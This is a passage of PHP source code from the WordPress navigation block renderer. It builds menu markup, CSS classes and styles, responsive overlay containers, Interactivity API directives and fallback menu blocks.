	 *
	 * @param array    $attributes The block attributes.
	 * @param WP_Block $block The parsed block.
	 * @return WP_Block_List Returns the inner blocks for the navigation block.
	 */
	private static function get_inner_blocks( $attributes, $block ) {
		$inner_blocks = $block->inner_blocks;

		// Ensure that blocks saved with the legacy ref attribute name (navigationMenuId) continue to render.
		if ( array_key_exists( 'navigationMenuId', $attributes ) ) {
			$attributes['ref'] = $attributes['navigationMenuId'];
		}

		// If:
		// - the gutenberg plugin is active
		// - `__unstableLocation` is defined
		// - we have menu items at the defined location
		// - we don't have a relationship to a `wp_navigation` Post (via `ref`).
		// ...then create inner blocks from the classic menu assigned to that location.
		if (
			defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN &&
			array_key_exists( '__unstableLocation', $attributes ) &&
			! array_key_exists( 'ref', $attributes ) &&
			! empty( block_core_navigation_get_menu_items_at_location( $attributes['__unstableLocation'] ) )
		) {
			$inner_blocks = block_core_navigation_get_inner_blocks_from_unstable_location( $attributes );
		}

		// Load inner blocks from the navigation post.
		if ( array_key_exists( 'ref', $attributes ) ) {
			$inner_blocks = static::get_inner_blocks_from_navigation_post( $attributes );
		}

		// If there are no inner blocks then fallback to rendering an appropriate fallback.
		if ( empty( $inner_blocks ) ) {
			$inner_blocks = static::get_inner_blocks_from_fallback( $attributes );
		}

		/**
		 * Filter navigation block $inner_blocks.
		 * Allows modification of a navigation block menu items.
		 *
		 * @since 6.1.0
		 *
		 * @param \WP_Block_List $inner_blocks
		 */
		$inner_blocks = apply_filters( 'block_core_navigation_render_inner_blocks', $inner_blocks );

		$post_ids = block_core_navigation_get_post_ids( $inner_blocks );
		if ( $post_ids ) {
			_prime_post_caches( $post_ids, false, false );
		}

		return $inner_blocks;
	}

	/**
	 * Gets the name of the current navigation, if it has one.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return string Returns the name of the navigation.
	 */
	private static function get_navigation_name( $attributes ) {

		$navigation_name = $attributes['ariaLabel'] ?? '';

		// Load the navigation post.
		if ( array_key_exists( 'ref', $attributes ) ) {
			$navigation_post = get_post( $attributes['ref'] );
			if ( ! isset( $navigation_post ) ) {
				return $navigation_name;
			}

			// Only published posts are valid. If this is changed then a corresponding change
			// must also be implemented in `use-navigation-menu.js`.
			if ( 'publish' === $navigation_post->post_status ) {
				$navigation_name = $navigation_post->post_title;

				// This is used to count the number of times a navigation name has been seen,
				// so that we can ensure every navigation has a unique id.
				if ( isset( static::$seen_menu_names[ $navigation_name ] ) ) {
					++static::$seen_menu_names[ $navigation_name ];
				} else {
					static::$seen_menu_names[ $navigation_name ] = 1;
				}
			}
		}

		return $navigation_name;
	}

	/**
	 * Returns the layout class for the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return string Returns the layout class for the navigation block.
	 */
	private static function get_layout_class( $attributes ) {
		$layout_justification = array(
			'left'          => 'items-justified-left',
			'right'         => 'items-justified-right',
			'center'        => 'items-justified-center',
			'space-between' => 'items-justified-space-between',
		);

		$layout_class = '';
		if (
			isset( $attributes['layout']['justifyContent'] ) &&
			isset( $layout_justification[ $attributes['layout']['justifyContent'] ] )
		) {
			$layout_class .= $layout_justification[ $attributes['layout']['justifyContent'] ];
		}
		if ( isset( $attributes['layout']['orientation'] ) && 'vertical' === $attributes['layout']['orientation'] ) {
			$layout_class .= ' is-vertical';
		}

		if ( isset( $attributes['layout']['flexWrap'] ) && 'nowrap' === $attributes['layout']['flexWrap'] ) {
			$layout_class .= ' no-wrap';
		}
		return $layout_class;
	}

	/**
	 * Return classes for the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return string Returns the classes for the navigation block.
	 */
	private static function get_classes( $attributes ) {
		// Restore legacy classnames for submenu positioning.
		$layout_class       = static::get_layout_class( $attributes );
		$colors             = block_core_navigation_build_css_colors( $attributes );
		$font_sizes         = block_core_navigation_build_css_font_sizes( $attributes );
		$is_responsive_menu = static::is_responsive( $attributes );

		// Manually add block support text decoration as CSS class.
		$text_decoration       = $attributes['style']['typography']['textDecoration'] ?? null;
		$text_decoration_class = sprintf( 'has-text-decoration-%s', $text_decoration );

		$classes = array_merge(
			$colors['css_classes'],
			$font_sizes['css_classes'],
			$is_responsive_menu ? array( 'is-responsive' ) : array(),
			$layout_class ? array( $layout_class ) : array(),
			$text_decoration ? array( $text_decoration_class ) : array()
		);
		return implode( ' ', $classes );
	}

	/**
	 * Get styles for the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return string Returns the styles for the navigation block.
	 */
	private static function get_styles( $attributes ) {
		$colors       = block_core_navigation_build_css_colors( $attributes );
		$font_sizes   = block_core_navigation_build_css_font_sizes( $attributes );
		$block_styles = isset( $attributes['styles'] ) ? $attributes['styles'] : '';
		return $block_styles . $colors['inline_styles'] . $font_sizes['inline_styles'];
	}

	/**
	 * Get the responsive container markup
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes The block attributes.
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 * @param string        $inner_blocks_html The markup for the inner blocks.
	 * @return string Returns the container markup.
	 */
	private static function get_responsive_container_markup( $attributes, $inner_blocks, $inner_blocks_html ) {
		$is_interactive  = static::is_interactive( $attributes, $inner_blocks );
		$colors          = block_core_navigation_build_css_colors( $attributes );
		$modal_unique_id = wp_unique_id( 'modal-' );

		$is_hidden_by_default = isset( $attributes['overlayMenu'] ) && 'always' === $attributes['overlayMenu'];

		$responsive_container_classes = array(
			'wp-block-navigation__responsive-container',
			$is_hidden_by_default ? 'hidden-by-default' : '',
			implode( ' ', $colors['overlay_css_classes'] ),
		);
		$open_button_classes          = array(
			'wp-block-navigation__responsive-container-open',
			$is_hidden_by_default ? 'always-shown' : '',
		);

		$should_display_icon_label = isset( $attributes['hasIcon'] ) && true === $attributes['hasIcon'];
		$toggle_button_icon        = '<svg width="24" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><rect x="4" y="7.5" width="16" height="1.5" /><rect x="4" y="15" width="16" height="1.5" /></svg>';
		if ( isset( $attributes['icon'] ) ) {
			if ( 'menu' === $attributes['icon'] ) {
				$toggle_button_icon = '<svg width="24" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M5 5v1.5h14V5H5zm0 7.8h14v-1.5H5v1.5zM5 19h14v-1.5H5V19z" /></svg>';
			}
		}
		$toggle_button_content       = $should_display_icon_label ? $toggle_button_icon : __( 'Menu' );
		$toggle_close_button_icon    = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" focusable="false"><path d="M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z"></path></svg>';
		$toggle_close_button_content = $should_display_icon_label ? $toggle_close_button_icon : __( 'Close' );
		$toggle_aria_label_open      = $should_display_icon_label ? 'aria-label="' . __( 'Open menu' ) . '"' : ''; // Open button label.
		$toggle_aria_label_close     = $should_display_icon_label ? 'aria-label="' . __( 'Close menu' ) . '"' : ''; // Close button label.

		// Add Interactivity API directives to the markup if needed.
		$open_button_directives          = '';
		$responsive_container_directives = '';
		$responsive_dialog_directives    = '';
		$close_button_directives         = '';
		if ( $is_interactive ) {
			$open_button_directives                  = '
				data-wp-on-async--click="actions.openMenuOnClick"
				data-wp-on--keydown="actions.handleMenuKeydown"
			';
			$responsive_container_directives         = '
				data-wp-class--has-modal-open="state.isMenuOpen"
				data-wp-class--is-menu-open="state.isMenuOpen"
				data-wp-watch="callbacks.initMenu"
				data-wp-on--keydown="actions.handleMenuKeydown"
				data-wp-on-async--focusout="actions.handleMenuFocusout"
				tabindex="-1"
			';
			$responsive_dialog_directives            = '
				data-wp-bind--aria-modal="state.ariaModal"
				data-wp-bind--aria-label="state.ariaLabel"
				data-wp-bind--role="state.roleAttribute"
			';
			$close_button_directives                 = '
				data-wp-on-async--click="actions.closeMenuOnClick"
			';
			$responsive_container_content_directives = '
				data-wp-watch="callbacks.focusFirstElement"
			';
		}

		$overlay_inline_styles = esc_attr( safecss_filter_attr( $colors['overlay_inline_styles'] ) );

		return sprintf(
			'<button aria-haspopup="dialog" %3$s class="%6$s" %10$s>%8$s</button>
				<div class="%5$s" %7$s id="%1$s" %11$s>
					<div class="wp-block-navigation__responsive-close" tabindex="-1">
						<div class="wp-block-navigation__responsive-dialog" %12$s>
							<button %4$s class="wp-block-navigation__responsive-container-close" %13$s>%9$s</button>
							<div class="wp-block-navigation__responsive-container-content" %14$s id="%1$s-content">
								%2$s
							</div>
						</div>
					</div>
				</div>',
			esc_attr( $modal_unique_id ),
			$inner_blocks_html,
			$toggle_aria_label_open,
			$toggle_aria_label_close,
			esc_attr( implode( ' ', $responsive_container_classes ) ),
			esc_attr( implode( ' ', $open_button_classes ) ),
			( ! empty( $overlay_inline_styles ) ) ? "style=\"$overlay_inline_styles\"" : '',
			$toggle_button_content,
			$toggle_close_button_content,
			$open_button_directives,
			$responsive_container_directives,
			$responsive_dialog_directives,
			$close_button_directives,
			$responsive_container_content_directives
		);
	}

	/**
	 * Get the wrapper attributes
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes    The block attributes.
	 * @param WP_Block_List $inner_blocks  A list of inner blocks.
	 * @return string Returns the navigation block markup.
	 */
	private static function get_nav_wrapper_attributes( $attributes, $inner_blocks ) {
		$nav_menu_name      = static::get_unique_navigation_name( $attributes );
		$is_interactive     = static::is_interactive( $attributes, $inner_blocks );
		$is_responsive_menu = static::is_responsive( $attributes );
		$style              = static::get_styles( $attributes );
		$class              = static::get_classes( $attributes );
		$wrapper_attributes = get_block_wrapper_attributes(
			array(
				'class'      => $class,
				'style'      => $style,
				'aria-label' => $nav_menu_name,
			)
		);

		if ( $is_responsive_menu ) {
			$nav_element_directives = static::get_nav_element_directives( $is_interactive );
			$wrapper_attributes    .= ' ' . $nav_element_directives;
		}

		return $wrapper_attributes;
	}

	/**
	 * Gets the nav element directives.
	 *
	 * @since 6.5.0
	 *
	 * @param bool $is_interactive Whether the block is interactive.
	 * @return string the directives for the navigation element.
	 */
	private static function get_nav_element_directives( $is_interactive ) {
		if ( ! $is_interactive ) {
			return '';
		}
		// When adding to this array be mindful of security concerns.
		$nav_element_context    = wp_interactivity_data_wp_context(
			array(
				'overlayOpenedBy' => array(
					'click' => false,
					'hover' => false,
					'focus' => false,
				),
				'type'            => 'overlay',
				'roleAttribute'   => '',
				'ariaLabel'       => __( 'Menu' ),
			)
		);
		$nav_element_directives = '
		 data-wp-interactive="core/navigation" '
		. $nav_element_context;

		return $nav_element_directives;
	}

	/**
	 * Handle view script module loading.
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes   The block attributes.
	 * @param WP_Block      $block        The parsed block.
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 */
	private static function handle_view_script_module_loading( $attributes, $block, $inner_blocks ) {
		if ( static::is_interactive( $attributes, $inner_blocks ) ) {
			$suffix = wp_scripts_get_suffix();
			if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
				$module_url = gutenberg_url( '/build/interactivity/navigation.min.js' );
			}

			wp_register_script_module(
				'@wordpress/block-library/navigation',
				isset( $module_url ) ? $module_url : includes_url( "blocks/navigation/view{$suffix}.js" ),
				array( '@wordpress/interactivity' ),
				defined( 'GUTENBERG_VERSION' ) ? GUTENBERG_VERSION : get_bloginfo( 'version' )
			);
			wp_enqueue_script_module( '@wordpress/block-library/navigation' );
		}
	}

	/**
	 * Returns the markup for the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes The block attributes.
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 * @return string Returns the navigation wrapper markup.
	 */
	private static function get_wrapper_markup( $attributes, $inner_blocks ) {
		$inner_blocks_html = static::get_inner_blocks_html( $attributes, $inner_blocks );
		if ( static::is_responsive( $attributes ) ) {
			return static::get_responsive_container_markup( $attributes, $inner_blocks, $inner_blocks_html );
		}
		return $inner_blocks_html;
	}

	/**
	 * Returns a unique name for the navigation.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return string Returns a unique name for the navigation.
	 */
	private static function get_unique_navigation_name( $attributes ) {
		$nav_menu_name = static::get_navigation_name( $attributes );

		// If the menu name has been used previously then append an ID
		// to the name to ensure uniqueness across a given post.
		if ( isset( static::$seen_menu_names[ $nav_menu_name ] ) && static::$seen_menu_names[ $nav_menu_name ] > 1 ) {
			$count         = static::$seen_menu_names[ $nav_menu_name ];
			$nav_menu_name = $nav_menu_name . ' ' . ( $count );
		}

		return $nav_menu_name;
	}

	/**
	 * Renders the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array    $attributes The block attributes.
	 * @param string   $content    The saved content.
	 * @param WP_Block $block      The parsed block.
	 * @return string Returns the navigation block markup.
	 */
	public static function render( $attributes, $content, $block ) {
		/**
		 * Deprecated:
		 * The rgbTextColor and rgbBackgroundColor attributes
		 * have been deprecated in favor of
		 * customTextColor and customBackgroundColor ones.
		 * Move the values from old attrs to the new ones.
		 */
		if ( isset( $attributes['rgbTextColor'] ) && empty( $attributes['textColor'] ) ) {
			$attributes['customTextColor'] = $attributes['rgbTextColor'];
		}

		if ( isset( $attributes['rgbBackgroundColor'] ) && empty( $attributes['backgroundColor'] ) ) {
			$attributes['customBackgroundColor'] = $attributes['rgbBackgroundColor'];
		}

		unset( $attributes['rgbTextColor'], $attributes['rgbBackgroundColor'] );

		$inner_blocks = static::get_inner_blocks( $attributes, $block );
		// Prevent navigation blocks referencing themselves from rendering.
		if ( block_core_navigation_block_contains_core_navigation( $inner_blocks ) ) {
			return '';
		}

		static::handle_view_script_module_loading( $attributes, $block, $inner_blocks );

		return sprintf(
			'<nav %1$s>%2$s</nav>',
			static::get_nav_wrapper_attributes( $attributes, $inner_blocks ),
			static::get_wrapper_markup( $attributes, $inner_blocks )
		);
	}
}

// These functions are used for the __unstableLocation feature and only active
// when the gutenberg plugin is active.
if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
	/**
	 * Returns the menu items for a WordPress menu location.
	 *
	 * @since 5.9.0
	 *
	 * @param string $location The menu location.
	 * @return array Menu items for the location.
	 */
	function block_core_navigation_get_menu_items_at_location( $location ) {
		if ( empty( $location ) ) {
			return;
		}

		// Build menu data. The following approximates the code in
		// `wp_nav_menu()` and `gutenberg_output_block_nav_menu`.

		// Find the location in the list of locations, returning early if the
		// location can't be found.
		$locations = get_nav_menu_locations();
		if ( ! isset( $locations[ $location ] ) ) {
			return;
		}

		// Get the menu from the location, returning early if there is no
		// menu or there was an error.
		$menu = wp_get_nav_menu_object( $locations[ $location ] );
		if ( ! $menu || is_wp_error( $menu ) ) {
			return;
		}

		$menu_items = wp_get_nav_menu_items( $menu->term_id, array( 'update_post_term_cache' => false ) );
		_wp_menu_item_classes_by_context( $menu_items );

		return $menu_items;
	}


	/**
	 * Sorts a standard array of menu items into a nested structure keyed by the
	 * id of the parent menu.
	 *
	 * @since 5.9.0
	 *
	 * @param array $menu_items Menu items to sort.
	 * @return array An array keyed by the id of the parent menu where each element
	 *               is an array of menu items that belong to that parent.
	 */
	function block_core_navigation_sort_menu_items_by_parent_id( $menu_items ) {
		$sorted_menu_items = array();
		foreach ( (array) $menu_items as $menu_item ) {
			$sorted_menu_items[ $menu_item->menu_order ] = $menu_item;
		}
		unset( $menu_items, $menu_item );

		$menu_items_by_parent_id = array();
		foreach ( $sorted_menu_items as $menu_item ) {
			$menu_items_by_parent_id[ $menu_item->menu_item_parent ][] = $menu_item;
		}

		return $menu_items_by_parent_id;
	}

	/**
	 * Gets the inner blocks for the navigation block from the unstable location attribute.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return WP_Block_List Returns the inner blocks for the navigation block.
	 */
	function block_core_navigation_get_inner_blocks_from_unstable_location( $attributes ) {
		$menu_items = block_core_navigation_get_menu_items_at_location( $attributes['__unstableLocation'] );
		if ( empty( $menu_items ) ) {
			return new WP_Block_List( array(), $attributes );
		}

		$menu_items_by_parent_id = block_core_navigation_sort_menu_items_by_parent_id( $menu_items );
		$parsed_blocks           = block_core_navigation_parse_blocks_from_menu_items( $menu_items_by_parent_id[0], $menu_items_by_parent_id );
		return new WP_Block_List( $parsed_blocks, $attributes );
	}
}

/**
 * Add Interactivity API directives to the navigation-submenu and page-list
 * blocks markup using the Tag Processor.
 *
 * @since 6.3.0
 *
 * @param WP_HTML_Tag_Processor $tags             Markup of the navigation block.
 * @param array                 $block_attributes Block attributes.
 *
 * @return string Submenu markup with the directives injected.
 */
function block_core_navigation_add_directives_to_submenu( $tags, $block_attributes ) {
	while ( $tags->next_tag(
		array(
			'tag_name'   => 'LI',
			'class_name' => 'has-child',
		)
	) ) {
		// Add directives to the parent `<li>`.
		$tags->set_attribute( 'data-wp-interactive', 'core/navigation' );
		$tags->set_attribute( 'data-wp-context', '{ "submenuOpenedBy": { "click": false, "hover": false, "focus": false }, "type": "submenu" }' );
		$tags->set_attribute( 'data-wp-watch', 'callbacks.initMenu' );
		$tags->set_attribute( 'data-wp-on--focusout', 'actions.handleMenuFocusout' );
		$tags->set_attribute( 'data-wp-on--keydown', 'actions.handleMenuKeydown' );

		// This is a fix for Safari. Without it, Safari doesn't change the active
		// element when the user clicks on a button. It can be removed once we add
		// an overlay to capture the clicks, instead of relying on the focusout
		// event.
		$tags->set_attribute( 'tabindex', '-1' );

		if ( ! isset( $block_attributes['openSubmenusOnClick'] ) || false === $block_attributes['openSubmenusOnClick'] ) {
			$tags->set_attribute( 'data-wp-on-async--mouseenter', 'actions.openMenuOnHover' );
			$tags->set_attribute( 'data-wp-on-async--mouseleave', 'actions.closeMenuOnHover' );
		}

		// Add directives to the toggle submenu button.
		if ( $tags->next_tag(
			array(
				'tag_name'   => 'BUTTON',
				'class_name' => 'wp-block-navigation-submenu__toggle',
			)
		) ) {
			$tags->set_attribute( 'data-wp-on-async--click', 'actions.toggleMenuOnClick' );
			$tags->set_attribute( 'data-wp-bind--aria-expanded', 'state.isMenuOpen' );
			// The `aria-expanded` attribute for SSR is already added in the submenu block.
		}
		// Add directives to the submenu.
		if ( $tags->next_tag(
			array(
				'tag_name'   => 'UL',
				'class_name' => 'wp-block-navigation__submenu-container',
			)
		) ) {
			$tags->set_attribute( 'data-wp-on-async--focus', 'actions.openMenuOnFocus' );
		}

		// Iterate through subitems if exist.
		block_core_navigation_add_directives_to_submenu( $tags, $block_attributes );
	}
	return $tags->get_updated_html();
}

/**
 * Build an array with CSS classes and inline styles defining the colors
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param array $attributes Navigation block attributes.
 *
 * @return array Colors CSS classes and inline styles.
 */
function block_core_navigation_build_css_colors( $attributes ) {
	$colors = array(
		'css_classes'           => array(),
		'inline_styles'         => '',
		'overlay_css_classes'   => array(),
		'overlay_inline_styles' => '',
	);

	// Text color.
	$has_named_text_color  = array_key_exists( 'textColor', $attributes );
	$has_custom_text_color = array_key_exists( 'customTextColor', $attributes );

	// If has text color.
	if ( $has_custom_text_color || $has_named_text_color ) {
		// Add has-text-color class.
		$colors['css_classes'][] = 'has-text-color';
	}

	if ( $has_named_text_color ) {
		// Add the color class.
		$colors['css_classes'][] = sprintf( 'has-%s-color', $attributes['textColor'] );
	} elseif ( $has_custom_text_color ) {
		// Add the custom color inline style.
		$colors['inline_styles'] .= sprintf( 'color: %s;', $attributes['customTextColor'] );
	}

	// Background color.
	$has_named_background_color  = array_key_exists( 'backgroundColor', $attributes );
	$has_custom_background_color = array_key_exists( 'customBackgroundColor', $attributes );

	// If has background color.
	if ( $has_custom_background_color || $has_named_background_color ) {
		// Add has-background class.
		$colors['css_classes'][] = 'has-background';
	}

	if ( $has_named_background_color ) {
		// Add the background-color class.
		$colors['css_classes'][] = sprintf( 'has-%s-background-color', $attributes['backgroundColor'] );
	} elseif ( $has_custom_background_color ) {
		// Add the custom background-color inline style.
		$colors['inline_styles'] .= sprintf( 'background-color: %s;', $attributes['customBackgroundColor'] );
	}

	// Overlay text color.
	$has_named_overlay_text_color  = array_key_exists( 'overlayTextColor', $attributes );
	$has_custom_overlay_text_color = array_key_exists( 'customOverlayTextColor', $attributes );

	// If has overlay text color.
	if ( $has_custom_overlay_text_color || $has_named_overlay_text_color ) {
		// Add has-text-color class.
		$colors['overlay_css_classes'][] = 'has-text-color';
	}

	if ( $has_named_overlay_text_color ) {
		// Add the overlay color class.
		$colors['overlay_css_classes'][] = sprintf( 'has-%s-color', $attributes['overlayTextColor'] );
	} elseif ( $has_custom_overlay_text_color ) {
		// Add the custom overlay color inline style.
		$colors['overlay_inline_styles'] .= sprintf( 'color: %s;', $attributes['customOverlayTextColor'] );
	}

	// Overlay background color.
	$has_named_overlay_background_color  = array_key_exists( 'overlayBackgroundColor', $attributes );
	$has_custom_overlay_background_color = array_key_exists( 'customOverlayBackgroundColor', $attributes );

	// If has overlay background color.
	if ( $has_custom_overlay_background_color || $has_named_overlay_background_color ) {
		// Add has-background class.
		$colors['overlay_css_classes'][] = 'has-background';
	}

	if ( $has_named_overlay_background_color ) {
		// Add the overlay background-color class.
		$colors['overlay_css_classes'][] = sprintf( 'has-%s-background-color', $attributes['overlayBackgroundColor'] );
	} elseif ( $has_custom_overlay_background_color ) {
		// Add the custom overlay background-color inline style.
		$colors['overlay_inline_styles'] .= sprintf( 'background-color: %s;', $attributes['customOverlayBackgroundColor'] );
	}

	return $colors;
}

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param array $attributes Navigation block attributes.
 *
 * @return array Font size CSS classes and inline styles.
 */
function block_core_navigation_build_css_font_sizes( $attributes ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $attributes );
	$has_custom_font_size = array_key_exists( 'customFontSize', $attributes );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $attributes['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf( 'font-size: %spx;', $attributes['customFontSize'] );
	}

	return $font_sizes;
}

/**
 * Returns the top-level submenu SVG chevron icon.
 *
 * @since 5.9.0
 *
 * @return string
 */
function block_core_navigation_render_submenu_icon() {
	return '<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg>';
}

/**
 * Filter out empty "null" blocks from the block list.
 * 'parse_blocks' includes a null block with '\n\n' as the content when
 * it encounters whitespace. This is not a bug but rather how the parser
 * is designed.
 *
 * @since 5.9.0
 *
 * @param array $parsed_blocks the parsed blocks to be normalized.
 * @return array the normalized parsed blocks.
 */
function block_core_navigation_filter_out_empty_blocks( $parsed_blocks ) {
	$filtered = array_filter(
		$parsed_blocks,
		static function ( $block ) {
			return isset( $block['blockName'] );
		}
	);

	// Reset keys.
	return array_values( $filtered );
}

/**
 * Returns true if the navigation block contains a nested navigation block.
 *
 * @since 6.2.0
 *
 * @param WP_Block_List $inner_blocks Inner block instance to be normalized.
 * @return bool true if the navigation block contains a nested navigation block.
 */
function block_core_navigation_block_contains_core_navigation( $inner_blocks ) {
	foreach ( $inner_blocks as $block ) {
		if ( 'core/navigation' === $block->name ) {
			return true;
		}
		if ( $block->inner_blocks && block_core_navigation_block_contains_core_navigation( $block->inner_blocks ) ) {
			return true;
		}
	}

	return false;
}

/**
 * Retrieves the appropriate fallback to be used on the front of the
 * site when there is no menu assigned to the Nav block.
 *
 * This aims to mirror how the fallback mechanic for wp_nav_menu works.
 * See https://developer.wordpress.org/reference/functions/wp_nav_menu/#more-information.
 *
 * @since 5.9.0
 *
 * @return array the array of blocks to be used as a fallback.
 */
function block_core_navigation_get_fallback_blocks() {
	$page_list_fallback = array(
		array(
			'blockName'    => 'core/page-list',
			'innerContent' => array(),
			'attrs'        => array(),
		),
	);

	$registry = WP_Block_Type_Registry::get_instance();

	// If `core/page-list` is not registered then return empty blocks.
	$fallback_blocks = $registry->is_registered( 'core/page-list' ) ? $page_list_fallback : array();
	$navigation_post = WP_Navigation_Fallback::get_fallback();

	// Use the first non-empty Navigation as fallback if available.
	if ( $navigation_post ) {
		$parsed_blocks  = parse_blocks( $navigation_post->post_content );
		$maybe_fallback = block_core_navigation_filter_out_empty_blocks( $parsed_blocks );

		// Normalizing blocks may result in an empty array of blocks if they were all `null` blocks.
		// In this case default to the (Page List) fallback.
		$fallback_blocks = ! empty( $maybe_fallback ) ? $maybe_fallback : $fallback_blocks;

		if ( function_exists( 'set_ignored_hooked_blocks_metadata' ) ) {
			// Run Block Hooks algorithm to inject hooked blocks.
			// We have to run it here because we need the post ID of the Navigation block to track ignored hooked blocks.
			$markup = block_core_navigation_insert_hooked_blocks( $fallback_blocks, $navigation_post );
			$blocks = parse_blocks( $markup );

			if ( isset( $blocks[0]['innerBlocks'] ) ) {
				$fallback_blocks = $blocks[0]['innerBlocks'];
			}
		}
	}

	/**
	 * Filters the fallback experience for the Navigation block.
	 *
	 * Returning a falsey value will opt out of the fallback and cause the block not to render.
	 * To customise the blocks provided return an array of blocks - these should be valid
	 * children of the `core/navigation` block.
	 *
	 * @since 5.9.0
	 *
	 * @param array[] $fallback_blocks default fallback blocks provided by the default block mechanic.
	 */
	return apply_filters( 'block_core_navigation_render_fallback', $fallback_blocks );
}

/**
 * Iterate through all inner blocks recursively and get navigation link block's post IDs.
 *
 * @since 6.0.0
 *
 * @param WP_Block_List $inner_blocks Block list class instance.
 *
 * @return array Array of post IDs.
 */
function block_core_navigation_get_post_ids( $inner_blocks ) {
	$post_ids = array_map( 'block_core_navigation_from_block_get_post_ids', iterator_to_array( $inner_blocks ) );
	return array_unique( array_merge( ...$post_ids ) );
}

/**
 * Get post IDs from a navigation link block instance.
 *
 * @since 6.0.0
 *
 * @param WP_Block $block Instance of a block.
 *
 * @return array Array of post IDs.
 */
function block_core_navigation_from_block_get_post_ids( $block ) {
	$post_ids = array();

	if ( $block->inner_blocks ) {
		$post_ids = block_core_navigation_get_post_ids( $block->inner_blocks );
	}

	if ( 'core/navigation-link' === $block->name || 'core/navigation-submenu' === $block->name ) {
		if ( $block->attributes && isset( $block->attributes['kind'] ) && 'post-type' === $block->attributes['kind'] && isset( $block->attributes['id'] ) ) {
			$post_ids[] = $block->attributes['id'];
		}
	}

	return $post_ids;
}

/**
 * Renders the `core/navigation` block on server.
 *
 * @since 5.9.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the navigation block markup.
 */
function render_block_core_navigation( $attributes, $content, $block ) {
	return WP_Navigation_Block_Renderer::render( $attributes, $content, $block );
}

/**
 * Register the navigation block.
 *
 * @since 5.9.0
 *
 * @uses render_block_core_navigation()
 * @throws WP_Error An WP_Error exception parsing the block definition.
 */
function register_block_core_navigation() {
	register_block_type_from_metadata(
		__DIR__ . '/navigation',
		array(
			'render_callback' => 'render_block_core_navigation',
		)
	);
}

add_action( 'init', 'register_block_core_navigation' );

/**
 * Filter that changes the parsed attribute values of navigation blocks contain typographic presets to contain the values directly.
 *
 * @since 5.9.0
 *
 * @param array $parsed_block The block being rendered.
 *
 * @return array The block being rendered without typographic presets.
 */
function block_core_navigation_typographic_presets_backcompatibility( $parsed_block ) {
	if ( 'core/navigation' === $parsed_block['blockName'] ) {
		$attribute_to_prefix_map = array(
			'fontStyle'      => 'var:preset|font-style|',
			'fontWeight'     => 'var:preset|font-weight|',
			'textDecoration' => 'var:preset|text-decoration|',
			'textTransform'  => 'var:preset|text-transform|',
		);
		foreach ( $attribute_to_prefix_map as $style_attribute => $prefix ) {
			if ( ! empty( $parsed_block['attrs']['style']['typography'][ $style_attribute ] ) ) {
				$prefix_len      = strlen( $prefix );
				$attribute_value = &$parsed_block['attrs']['style']['typography'][ $style_attribute ];
				if ( 0 === strncmp( $attribute_value, $prefix, $prefix_len ) ) {
					$attribute_value = substr( $attribute_value, $prefix_len );
				}
				if ( 'textDecoration' === $style_attribute && 'strikethrough' === $attribute_value ) {
					$attribute_value = 'line-through';
				}
			}
		}
	}

	return $parsed_block;
}

add_filter( 'render_block_data', 'block_core_navigation_typographic_presets_backcompatibility' );

/**
 * Turns menu item data into a nested array of parsed blocks
 *
 * @since 5.9.0
 *
 * @deprecated 6.3.0 Use WP_Navigation_Fallback::parse_blocks_from_menu_items() instead.
 *
 * @param array $menu_items               An array of menu items that represent
 *                                        an individual level of a menu.
 * @param array $menu_items_by_parent_id  An array keyed by the id of the
 *                                        parent menu where each element is an
 *                                        array of menu items that belong to
 *                                        that parent.
 * @return array An array of parsed block data.
 */
function block_core_navigation_parse_blocks_from_menu_items( $menu_items, $menu_items_by_parent_id ) {

	_deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::parse_blocks_from_menu_items' );

	if ( empty( $menu_items ) ) {
		return array();
	}

	$blocks = array();

	foreach ( $menu_items as $menu_item ) {
		$class_name       = ! empty( $menu_item->classes ) ? implode( ' ', (array) $menu_item->classes ) : null;
		$id               = ( null !== $menu_item->object_id && 'custom' !== $menu_item->object ) ? $menu_item->object_id : null;
		$opens_in_new_tab = null !== $menu_item->target && '_blank' === $menu_item->target;
